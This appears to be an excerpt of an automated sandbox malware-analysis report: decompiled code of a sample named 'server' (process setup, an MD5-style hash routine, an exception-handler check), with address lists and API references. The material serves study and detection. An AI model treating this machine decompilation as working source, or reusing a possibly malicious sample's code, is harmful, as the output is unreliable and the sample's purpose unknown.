            • Instruction ID: e84ad497415cc88d5cc78291cb7ccfbc555e8ac827060fad950c62b9be5009cc
            • Opcode Fuzzy Hash: 7c3016eb626c2beff235e8d9fbf8f22b60b3004b6a0caaf9dafe76e3f10a1e03
            • Instruction Fuzzy Hash: E2F0BB722005549BD720A677DC49EFB37ACDFCD314F010365FE45C7201EA34E95586A1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401D68() {
            				void* _t1;
            				unsigned int _t3;
            				void* _t4;
            				long _t5;
            				void* _t6;
            				intOrPtr _t10;
            				void* _t14;
            
            				_t10 =  *0x404170;
            				_t1 = CreateEventA(0, 1, 0, 0);
            				 *0x40417c = _t1;
            				if(_t1 == 0) {
            					return GetLastError();
            				}
            				_t3 = GetVersion();
            				if(_t3 != 5) {
            					L4:
            					if(_t14 <= 0) {
            						_t4 = 0x32;
            						return _t4;
            					} else {
            						goto L5;
            					}
            				} else {
            					if(_t3 >> 8 > 0) {
            						L5:
            						 *0x40416c = _t3;
            						_t5 = GetCurrentProcessId();
            						 *0x404168 = _t5;
            						 *0x404170 = _t10;
            						_t6 = OpenProcess(0x10047a, 0, _t5);
            						 *0x404164 = _t6;
            						if(_t6 == 0) {
            							 *0x404164 =  *0x404164 | 0xffffffff;
            						}
            						return 0;
            					} else {
            						_t14 = _t3 - _t3;
            						goto L4;
            					}
            				}
            			}










            0x00401d69
            0x00401d77
            0x00401d7d
            0x00401d84
            0x00401ddb
            0x00401ddb
            0x00401d86
            0x00401d8e
            0x00401d9b
            0x00401d9b
            0x00401dd7
            0x00401dd9
            0x00000000
            0x00000000
            0x00000000
            0x00401d90
            0x00401d97
            0x00401d9d
            0x00401d9d
            0x00401da2
            0x00401db0
            0x00401db5
            0x00401dbb
            0x00401dc1
            0x00401dc8
            0x00401dca
            0x00401dca
            0x00401dd4
            0x00401d99
            0x00401d99
            0x00000000
            0x00401d99
            0x00401d97

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
            • GetVersion.KERNEL32 ref: 00401D86
            • GetCurrentProcessId.KERNEL32 ref: 00401DA2
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Process$CreateCurrentEventOpenVersion
            • String ID:
            • API String ID: 845504543-0
            • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
            • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 49%
            			E047E16DF(void* __ecx, intOrPtr* _a4) {
            				signed int _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				intOrPtr _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				void _v76;
            				intOrPtr* _t226;
            				signed int _t229;
            				signed int _t231;
            				signed int _t233;
            				signed int _t235;
            				signed int _t237;
            				signed int _t239;
            				signed int _t241;
            				signed int _t243;
            				signed int _t245;
            				signed int _t247;
            				signed int _t249;
            				signed int _t251;
            				signed int _t253;
            				signed int _t255;
            				signed int _t257;
            				signed int _t259;
            				signed int _t338;
            				signed char* _t348;
            				signed int _t349;
            				signed int _t351;
            				signed int _t353;
            				signed int _t355;
            				signed int _t357;
            				signed int _t359;
            				signed int _t361;
            				signed int _t363;
            				signed int _t365;
            				signed int _t367;
            				signed int _t376;
            				signed int _t378;
            				signed int _t380;
            				signed int _t382;
            				signed int _t384;
            				intOrPtr* _t400;
            				signed int* _t401;
            				signed int _t402;
            				signed int _t404;
            				signed int _t406;
            				signed int _t408;
            				signed int _t410;
            				signed int _t412;
            				signed int _t414;
            				signed int _t416;
            				signed int _t418;
            				signed int _t420;
            				signed int _t422;
            				signed int _t424;
            				signed int _t432;
            				signed int _t434;
            				signed int _t436;
            				signed int _t438;
            				signed int _t440;
            				signed int _t508;
            				signed int _t599;
            				signed int _t607;
            				signed int _t613;
            				signed int _t679;
            				void* _t682;
            				signed int _t683;
            				signed int _t685;
            				signed int _t690;
            				signed int _t692;
            				signed int _t697;
            				signed int _t699;
            				signed int _t718;
            				signed int _t720;
            				signed int _t722;
            				signed int _t724;
            				signed int _t726;
            				signed int _t728;
            				signed int _t734;
            				signed int _t740;
            				signed int _t742;
            				signed int _t744;
            				signed int _t746;
            				signed int _t748;
            
            				_t226 = _a4;
            				_t348 = __ecx + 2;
            				_t401 =  &_v76;
            				_t682 = 0x10;
            				do {
            					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
            					_t401 =  &(_t401[1]);
            					_t348 =  &(_t348[4]);
            					_t682 = _t682 - 1;
            				} while (_t682 != 0);
            				_t6 = _t226 + 4; // 0x14eb3fc3
            				_t683 =  *_t6;
            				_t7 = _t226 + 8; // 0x8d08458b
            				_t402 =  *_t7;
            				_t8 = _t226 + 0xc; // 0x56c1184c
            				_t349 =  *_t8;
            				asm("rol eax, 0x7");
            				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
            				asm("rol ecx, 0xc");
            				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
            				asm("ror edx, 0xf");
            				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
            				asm("ror esi, 0xa");
            				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
            				_v8 = _t685;
            				_t690 = _v8;
            				asm("rol eax, 0x7");
            				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
            				asm("rol ecx, 0xc");
            				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
            				asm("ror edx, 0xf");
            				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
            				asm("ror esi, 0xa");
            				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
            				_v8 = _t692;
            				_t697 = _v8;
            				asm("rol eax, 0x7");
            				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
            				asm("rol ecx, 0xc");
            				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
            				asm("ror edx, 0xf");
            				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
            				asm("ror esi, 0xa");
            				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
            				_v8 = _t699;
            				asm("rol eax, 0x7");
            				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
            				asm("rol ecx, 0xc");
            				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
            				_t508 =  !_t357;
            				asm("ror edx, 0xf");
            				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
            				_v12 = _t410;
            				_v12 =  !_v12;
            				asm("ror esi, 0xa");
            				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
            				asm("rol eax, 0x5");
            				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
            				asm("rol ecx, 0x9");
            				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
            				asm("rol edx, 0xe");
            				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
            				asm("ror esi, 0xc");
            				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
            				asm("rol eax, 0x5");
            				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
            				asm("rol ecx, 0x9");
            				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
            				asm("rol edx, 0xe");
            				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
            				asm("ror esi, 0xc");
            				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
            				asm("rol eax, 0x5");
            				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
            				asm("rol ecx, 0x9");
            				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
            				asm("rol edx, 0xe");
            				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
            				asm("ror esi, 0xc");
            				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
            				asm("rol eax, 0x5");
            				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
            				asm("rol ecx, 0x9");
            				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
            				asm("rol edx, 0xe");
            				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
            				asm("ror esi, 0xc");
            				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
            				asm("rol eax, 0x4");
            				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
            				asm("rol ecx, 0xb");
            				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
            				asm("rol edx, 0x10");
            				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
            				_t599 = _t367 ^ _t420;
            				asm("ror esi, 0x9");
            				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
            				asm("rol eax, 0x4");
            				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
            				asm("rol edi, 0xb");
            				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
            				asm("rol edx, 0x10");
            				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
            				_t338 = _t607 ^ _t422;
            				asm("ror ecx, 0x9");
            				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
            				asm("rol eax, 0x4");
            				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
            				asm("rol esi, 0xb");
            				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
            				asm("rol edi, 0x10");
            				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
            				_t424 = _t734 ^ _t613;
            				asm("ror ecx, 0x9");
            				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
            				asm("rol eax, 0x4");
            				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
            				asm("rol edx, 0xb");
            				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
            				asm("rol esi, 0x10");
            				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
            				asm("ror ecx, 0x9");
            				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
            				asm("rol eax, 0x6");
            				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
            				asm("rol edx, 0xa");
            				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
            				asm("rol esi, 0xf");
            				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
            				asm("ror ecx, 0xb");
            				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
            				asm("rol eax, 0x6");
            				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
            				asm("rol edx, 0xa");
            				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
            				asm("rol esi, 0xf");
            				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
            				asm("ror ecx, 0xb");
            				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
            				asm("rol eax, 0x6");
            				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
            				asm("rol edx, 0xa");
            				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
            				asm("rol esi, 0xf");
            				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
            				asm("ror edi, 0xb");
            				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
            				asm("rol eax, 0x6");
            				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
            				asm("rol edx, 0xa");
            				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
            				_t400 = _a4;
            				asm("rol esi, 0xf");
            				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
            				 *_t400 =  *_t400 + _t259;
            				asm("ror eax, 0xb");
            				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
            				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
            				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
            				return memset( &_v76, 0, 0x40);
            			}


































































































            0x047e16e2
            0x047e16ed
            0x047e16f0
            0x047e16f3
            0x047e16f4
            0x047e1712
            0x047e1714
            0x047e1717
            0x047e171a
            0x047e171a
            0x047e171d
            0x047e171d
            0x047e1720
            0x047e1720
            0x047e1723
            0x047e1723
            0x047e1740
            0x047e1743
            0x047e1759
            0x047e175c
            0x047e1776
            0x047e1779
            0x047e178f
            0x047e1792
            0x047e1794
            0x047e17ac
            0x047e17af
            0x047e17b2
            0x047e17ca
            0x047e17cd
            0x047e17e7
            0x047e17ea
            0x047e1800
            0x047e1803
            0x047e1805
            0x047e181d
            0x047e1822
            0x047e1825
            0x047e183b
            0x047e183e
            0x047e1858
            0x047e185b
            0x047e1871
            0x047e1874
            0x047e1876
            0x047e1891
            0x047e1894
            0x047e18ab
            0x047e18ae
            0x047e18b2
            0x047e18cb
            0x047e18ce
            0x047e18d0
            0x047e18d3
            0x047e18ee
            0x047e18f1
            0x047e190a
            0x047e190d
            0x047e191d
            0x047e1920
            0x047e1938
            0x047e193b
            0x047e1955
            0x047e1958
            0x047e1970
            0x047e1973
            0x047e1989
            0x047e198c
            0x047e19a4
            0x047e19a7
            0x047e19bf
            0x047e19c2
            0x047e19dc
            0x047e19df
            0x047e19f5
            0x047e19f8
            0x047e1a10
            0x047e1a13
            0x047e1a2d
            0x047e1a30
            0x047e1a48
            0x047e1a4b
            0x047e1a61
            0x047e1a64
            0x047e1a7c
            0x047e1a7f
            0x047e1a97
            0x047e1a9a
            0x047e1aac
            0x047e1aaf
            0x047e1ac1
            0x047e1ac4
            0x047e1ad6
            0x047e1ad9
            0x047e1add
            0x047e1aed
            0x047e1af0
            0x047e1afe
            0x047e1b01
            0x047e1b13
            0x047e1b16
            0x047e1b2a
            0x047e1b2d
            0x047e1b2f
            0x047e1b3f
            0x047e1b42
            0x047e1b54
            0x047e1b57
            0x047e1b65
            0x047e1b68
            0x047e1b7a
            0x047e1b7d
            0x047e1b81
            0x047e1b91
            0x047e1b94
            0x047e1ba6
            0x047e1ba9
            0x047e1bb7
            0x047e1bba
            0x047e1bcc
            0x047e1bcf
            0x047e1be1
            0x047e1be4
            0x047e1bf8
            0x047e1bfb
            0x047e1c0f
            0x047e1c12
            0x047e1c26
            0x047e1c29
            0x047e1c3d
            0x047e1c40
            0x047e1c54
            0x047e1c57
            0x047e1c6b
            0x047e1c70
            0x047e1c82
            0x047e1c85
            0x047e1c99
            0x047e1c9c
            0x047e1cb0
            0x047e1cb3
            0x047e1cc9
            0x047e1ccc
            0x047e1ce0
            0x047e1ce3
            0x047e1cf5
            0x047e1cf8
            0x047e1d0c
            0x047e1d0f
            0x047e1d23
            0x047e1d26
            0x047e1d3a
            0x047e1d43
            0x047e1d46
            0x047e1d4f
            0x047e1d58
            0x047e1d60
            0x047e1d68
            0x047e1d72
            0x047e1d87

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: memset
            • String ID:
            • API String ID: 2221118986-0
            • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction ID: 1cd9242d13c31591cae5bd88b4276de093ee30bb62b7ff158e5094217d8de185
            • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction Fuzzy Hash: C922857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E8551(long _a4) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				short* _v32;
            				void _v36;
            				void* _t57;
            				signed int _t58;
            				signed int _t61;
            				signed int _t62;
            				void* _t63;
            				signed int* _t68;
            				intOrPtr* _t69;
            				intOrPtr* _t71;
            				intOrPtr _t72;
            				intOrPtr _t75;
            				void* _t76;
            				signed int _t77;
            				void* _t78;
            				void _t80;
            				signed int _t81;
            				signed int _t84;
            				signed int _t86;
            				short* _t87;
            				void* _t89;
            				signed int* _t90;
            				long _t91;
            				signed int _t93;
            				signed int _t94;
            				signed int _t100;
            				signed int _t102;
            				void* _t104;
            				long _t108;
            				signed int _t110;
            
            				_t108 = _a4;
            				_t76 =  *(_t108 + 8);
            				if((_t76 & 0x00000003) != 0) {
            					L3:
            					return 0;
            				}
            				_a4 =  *[fs:0x4];
            				_v8 =  *[fs:0x8];
            				if(_t76 < _v8 || _t76 >= _a4) {
            					_t102 =  *(_t108 + 0xc);
            					__eflags = _t102 - 0xffffffff;
            					if(_t102 != 0xffffffff) {
            						_t91 = 0;
            						__eflags = 0;
            						_a4 = 0;
            						_t57 = _t76;
            						do {
            							_t80 =  *_t57;
            							__eflags = _t80 - 0xffffffff;
            							if(_t80 == 0xffffffff) {
            								goto L9;
            							}
            							__eflags = _t80 - _t91;
            							if(_t80 >= _t91) {
            								L20:
            								_t63 = 0;
            								L60:
            								return _t63;
            							}
            							L9:
            							__eflags =  *(_t57 + 4);
            							if( *(_t57 + 4) != 0) {
            								_t12 =  &_a4;
            								 *_t12 = _a4 + 1;
            								__eflags =  *_t12;
            							}
            							_t91 = _t91 + 1;
            							_t57 = _t57 + 0xc;
            							__eflags = _t91 - _t102;
            						} while (_t91 <= _t102);
            						__eflags = _a4;
            						if(_a4 == 0) {
            							L15:
            							_t81 =  *0x47ea380; // 0x0
            							_t110 = _t76 & 0xfffff000;
            							_t58 = 0;
            							__eflags = _t81;
            							if(_t81 <= 0) {
            								L18:
            								_t104 = _t102 | 0xffffffff;
            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
            								__eflags = _t61;
            								if(_t61 < 0) {
            									_t62 = 0;
            									__eflags = 0;
            								} else {
            									_t62 = _a4;
            								}
            								__eflags = _t62;
            								if(_t62 == 0) {
            									L59:
            									_t63 = _t104;
            									goto L60;
            								} else {
            									__eflags = _v12 - 0x1000000;
            									if(_v12 != 0x1000000) {
            										goto L59;
            									}
            									__eflags = _v16 & 0x000000cc;
            									if((_v16 & 0x000000cc) == 0) {
            										L46:
            										_t63 = 1;
            										 *0x47ea3c8 = 1;
            										__eflags =  *0x47ea3c8;
            										if( *0x47ea3c8 != 0) {
            											goto L60;
            										}
            										_t84 =  *0x47ea380; // 0x0
            										__eflags = _t84;
            										_t93 = _t84;
            										if(_t84 <= 0) {
            											L51:
            											__eflags = _t93;
            											if(_t93 != 0) {
            												L58:
            												 *0x47ea3c8 = 0;
            												goto L5;
            											}
            											_t77 = 0xf;
            											__eflags = _t84 - _t77;
            											if(_t84 <= _t77) {
            												_t77 = _t84;
            											}
            											_t94 = 0;
            											__eflags = _t77;
            											if(_t77 < 0) {
            												L56:
            												__eflags = _t84 - 0x10;
            												if(_t84 < 0x10) {
            													_t86 = _t84 + 1;
            													__eflags = _t86;
            													 *0x47ea380 = _t86;
            												}
            												goto L58;
            											} else {
            												do {
            													_t68 = 0x47ea388 + _t94 * 4;
            													_t94 = _t94 + 1;
            													__eflags = _t94 - _t77;
            													 *_t68 = _t110;
            													_t110 =  *_t68;
            												} while (_t94 <= _t77);
            												goto L56;
            											}
            										}
            										_t69 = 0x47ea384 + _t84 * 4;
            										while(1) {
            											__eflags =  *_t69 - _t110;
            											if( *_t69 == _t110) {
            												goto L51;
            											}
            											_t93 = _t93 - 1;
            											_t69 = _t69 - 4;
            											__eflags = _t93;
            											if(_t93 > 0) {
            												continue;
            											}
            											goto L51;
            										}
            										goto L51;
            									}
            									_t87 = _v32;
            									__eflags =  *_t87 - 0x5a4d;
            									if( *_t87 != 0x5a4d) {
            										goto L59;
            									}
            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
            									__eflags =  *_t71 - 0x4550;
            									if( *_t71 != 0x4550) {
            										goto L59;
            									}
            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
            										goto L59;
            									}
            									_t78 = _t76 - _t87;
            									__eflags =  *((short*)(_t71 + 6));
            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
            									if( *((short*)(_t71 + 6)) <= 0) {
            										goto L59;
            									}
            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
            									__eflags = _t78 - _t72;
            									if(_t78 < _t72) {
            										goto L46;
            									}
            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
            										goto L46;
            									}
            									__eflags =  *(_t89 + 0x27) & 0x00000080;
            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
            										goto L20;
            									}
            									goto L46;
            								}
            							} else {
            								goto L16;
            							}
            							while(1) {
            								L16:
            								__eflags =  *((intOrPtr*)(0x47ea388 + _t58 * 4)) - _t110;
            								if( *((intOrPtr*)(0x47ea388 + _t58 * 4)) == _t110) {
            									break;
            								}
            								_t58 = _t58 + 1;
            								__eflags = _t58 - _t81;
            								if(_t58 < _t81) {
            									continue;
            								}
            								goto L18;
            							}
            							__eflags = _t58;
            							if(_t58 <= 0) {
            								goto L5;
            							}
            							 *0x47ea3c8 = 1;
            							__eflags =  *0x47ea3c8;
            							if( *0x47ea3c8 != 0) {
            								goto L5;
            							}
            							__eflags =  *((intOrPtr*)(0x47ea388 + _t58 * 4)) - _t110;
            							if( *((intOrPtr*)(0x47ea388 + _t58 * 4)) == _t110) {
            								L32:
            								_t100 = 0;
            								__eflags = _t58;
            								if(_t58 < 0) {
            									L34:
            									 *0x47ea3c8 = 0;
            									goto L5;
            								} else {
            									goto L33;
            								}
            								do {
            									L33:
            									_t90 = 0x47ea388 + _t100 * 4;
            									_t100 = _t100 + 1;
            									__eflags = _t100 - _t58;
            									 *_t90 = _t110;
            									_t110 =  *_t90;
            								} while (_t100 <= _t58);
            								goto L34;
            							}
            							_t25 = _t81 - 1; // -1
            							_t58 = _t25;
            							__eflags = _t58;
            							if(_t58 < 0) {
            								L28:
            								__eflags = _t81 - 0x10;
            								if(_t81 < 0x10) {
            									_t81 = _t81 + 1;
            									__eflags = _t81;
            									 *0x47ea380 = _t81;
            								}
            								_t28 = _t81 - 1; // 0x0
            								_t58 = _t28;
            								goto L32;
            							} else {
            								goto L25;
            							}
            							while(1) {
            								L25:
            								__eflags =  *((intOrPtr*)(0x47ea388 + _t58 * 4)) - _t110;
            								if( *((intOrPtr*)(0x47ea388 + _t58 * 4)) == _t110) {
            									break;
            								}
            								_t58 = _t58 - 1;
            								__eflags = _t58;
            								if(_t58 >= 0) {
            									continue;
            								}
            								break;
            							}
            							__eflags = _t58;
            							if(__eflags >= 0) {
            								if(__eflags == 0) {
            									goto L34;
            								}
            								goto L32;
            							}
            							goto L28;
            						}
            						_t75 =  *((intOrPtr*)(_t108 - 8));
            						__eflags = _t75 - _v8;
            						if(_t75 < _v8) {
            							goto L20;
            						}
            						__eflags = _t75 - _t108;
            						if(_t75 >= _t108) {
            							goto L20;
            						}
            						goto L15;
            					}
            					L5:
            					_t63 = 1;
            					goto L60;
            				} else {
            					goto L3;
            				}
            			}




































            0x047e855b
            0x047e855e
            0x047e8564
            0x047e8582
            0x00000000
            0x047e8582
            0x047e856c
            0x047e8575
            0x047e857b
            0x047e858a
            0x047e858d
            0x047e8590
            0x047e859a
            0x047e859a
            0x047e859c
            0x047e859f
            0x047e85a1
            0x047e85a1
            0x047e85a3
            0x047e85a6
            0x00000000
            0x00000000
            0x047e85a8
            0x047e85aa
            0x047e8610
            0x047e8610
            0x047e876e
            0x00000000
            0x047e876e
            0x047e85ac
            0x047e85ac
            0x047e85b0
            0x047e85b2
            0x047e85b2
            0x047e85b2
            0x047e85b2
            0x047e85b5
            0x047e85b6
            0x047e85b9
            0x047e85b9
            0x047e85bd
            0x047e85c1
            0x047e85cf
            0x047e85cf
            0x047e85d7
            0x047e85dd
            0x047e85df
            0x047e85e1
            0x047e85f1
            0x047e85fe
            0x047e8602
            0x047e8607
            0x047e8609
            0x047e8687
            0x047e8687
            0x047e860b
            0x047e860b
            0x047e860b
            0x047e8689
            0x047e868b
            0x047e876c
            0x047e876c
            0x00000000
            0x047e8691
            0x047e8691
            0x047e8698
            0x00000000
            0x00000000
            0x047e869e
            0x047e86a2
            0x047e86fe
            0x047e8700
            0x047e8708
            0x047e870a
            0x047e870c
            0x00000000
            0x00000000
            0x047e870e
            0x047e8714
            0x047e8716
            0x047e8718
            0x047e872d
            0x047e872d
            0x047e872f
            0x047e875e
            0x047e8765
            0x00000000
            0x047e8765
            0x047e8733
            0x047e8734
            0x047e8736
            0x047e8738
            0x047e8738
            0x047e873a
            0x047e873c
            0x047e873e
            0x047e8752
            0x047e8752
            0x047e8755
            0x047e8757
            0x047e8757
            0x047e8758
            0x047e8758
            0x00000000
            0x047e8740
            0x047e8740
            0x047e8740
            0x047e8749
            0x047e874a
            0x047e874c
            0x047e874e
            0x047e874e
            0x00000000
            0x047e8740
            0x047e873e
            0x047e871a
            0x047e8721
            0x047e8721
            0x047e8723
            0x00000000
            0x00000000
            0x047e8725
            0x047e8726
            0x047e8729
            0x047e872b
            0x00000000
            0x00000000
            0x00000000
            0x047e872b
            0x00000000
            0x047e8721
            0x047e86a4
            0x047e86a7
            0x047e86ac
            0x00000000
            0x00000000
            0x047e86b5
            0x047e86b7
            0x047e86bd
            0x00000000
            0x00000000
            0x047e86c3
            0x047e86c9
            0x00000000
            0x00000000
            0x047e86cf
            0x047e86d1
            0x047e86da
            0x047e86de
            0x00000000
            0x00000000
            0x047e86e4
